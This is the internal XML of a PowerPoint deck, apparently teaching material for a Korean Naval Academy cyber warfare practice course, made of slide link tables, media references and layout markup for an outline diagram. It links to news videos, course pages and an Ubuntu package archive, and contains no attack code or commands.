<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=fDXQYezdcIQ"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hyperlink" Target="https://www.youtube.com/watch?v=jZPudR4pWxM" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MA6ugSrB8eY" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide431.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=ynrsAtAlHqo" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=GisH2IQgob8" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#51060;&#46976;&#44284;%20&#48513;&#54620;&#51012;%20&#44277;&#44201;&#54616;&#44592;%20&#50948;&#54620;%20&#48120;&#44397;&#51032;%20&#49324;&#51060;&#48260;%20&#54644;&#52964;%20&#50977;&#49457;%20%5b&#49800;&#54140;&#54253;&#53444;%5d.mp4" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.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50689;&#49345;/&#48513;&#54620;%20&#53076;&#47196;&#45208;%20&#51228;&#51312;&#49324;%20&#44277;&#44201;.mp4" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=IS3UpC121bI" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/320%20&#49324;&#51060;&#48260;&#53580;&#47084;.mp4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/Imitation%20Game%20-%20&#50640;&#45768;&#44536;&#47560;%20&#54644;&#46021;%20&#51109;&#47732;.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b&#50549;&#52964;&amp;&#47532;&#54252;&#53944;%5d%20&#36557;%20&#45236;&#48512;&#47581;%202&#45380;&#44036;%20&#50808;&#48512;%20&#51217;&#49549;&#8230;&#48372;&#50504;%20&#8216;&#44396;&#47693;&#8217;.mp4" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=XGWP7v0OzTI" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide432.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.inflearn.com/course/%EC%9D%B4%EA%B2%83%EC%9D%B4-%EB%A6%AC%EB%88%85%EC%8A%A4%EB%8B%A4"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588.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kocw.net/home/search/kemView.do?kemId=978503" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide433.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image" Target="../media/image589.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93.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hyperlink" Target="http://archive.ubuntu.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.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slide" Target="slide429.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide46.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slide" Target="slide157.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide186.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide226.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide134.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide242.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide221.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide217.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide231.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide160.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide209.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide186.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide134.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/></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9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.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www.kitribob.kr/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kitribob.wiki/wiki/%EB%B0%B1%EB%8F%84%EC%9A%B0" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide50.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51.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52.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slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide53.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54.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55.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56.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slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide68.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide73.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide59.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide77.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide67.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide72.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide71.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide75.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide62.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide66.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide61.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide70.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide65.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide74.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide60.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide64.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide69.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide58.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429.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 Target="slide57.xml"/><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69.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429.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429.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ieeexplore.ieee.org/document/8999252" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId4"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slide" Target="slide95.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide85.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide94.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide82.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide91.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide98.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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81.xml"/><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83.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8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85.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jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.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42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42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81.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><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112.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.pn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90.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42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42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slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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4.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.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slide" Target="slide81.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide95.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slide" Target="slide81.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide96.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429.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide97.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429.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide98.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42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42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90E61B-2259-459B-B631-B6F586300E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사이버전실습</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B9020A-949D-434C-B341-DB64D1EDEBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3844212"/>
            <a:ext cx="9144000" cy="1413588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>해군사관학교</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3782619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2603AEEE-E066-4071-8E11-2AE63AB67F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8423342" y="1986245"/>
            <a:ext cx="3080691" cy="1634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en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 구성</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E7CD1D-F5FF-4ABA-9E73-3D172D994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310" y="2694220"/>
            <a:ext cx="864636" cy="6484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5287CE2E-9131-4A0F-8543-6C4A452336F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414865" y="3466588"/>
            <a:ext cx="659366" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Intro</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E796E03F-61A7-40DC-BA17-AF73DFFFD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521" y="3898255"/>
            <a:ext cx="864636" cy="64847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연결선: 꺾임 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6EC7EF5-A46A-478B-8D41-3FBD4DFDB05E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1028" idx="2"/>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4077676" y="3600648"/>
            <a:ext cx="879797"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9CC3AA25-EF85-44B6-968F-E5300BA47845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1028" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4392584" y="3285740"/>
            <a:ext cx="249981"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56E398F-71D9-4FAB-988A-926A9C500451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584438" y="2873899"/>
            <a:ext cx="659366" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBB7F8D7-8340-4973-BF35-3BEA659EDB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5424191" y="4077743"/>
            <a:ext cx="659366" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Plan</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E293B761-0092-4B20-A409-D5212F571BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6158203" y="4698420"/>
            <a:ext cx="1371605"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/Inforsec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9267494F-BB27-4E5A-BD9B-2112A32B6842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156641" y="5382410"/>
            <a:ext cx="1527119"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/Defcybsec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="연결선: 꺾임 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68E2506-39E6-4C14-BD77-6211109077E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5126850" y="4551720"/>
            <a:ext cx="373870" cy="363893"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99914"/>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75094738-9D18-4B52-B89A-EBABB72AC249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4808116" y="4870455"/>
            <a:ext cx="989567" cy="342120"/>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5E4120-B6AF-4C85-BB97-7FEA51BA2374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6068005" y="5963139"/>
            <a:ext cx="461665" cy="648477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>… …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="직선 화살표 연결선 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFEBF4B5-8580-440F-B17A-5D028EB02B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6074231" y="3163210"/>
            <a:ext cx="1903447" cy="45726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문서 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DF887C0-C82E-44FB-B4BA-DDF6538BF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5935" y="327530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그림 1035">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBA31C24-D96A-4656-9812-0AAD09779AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
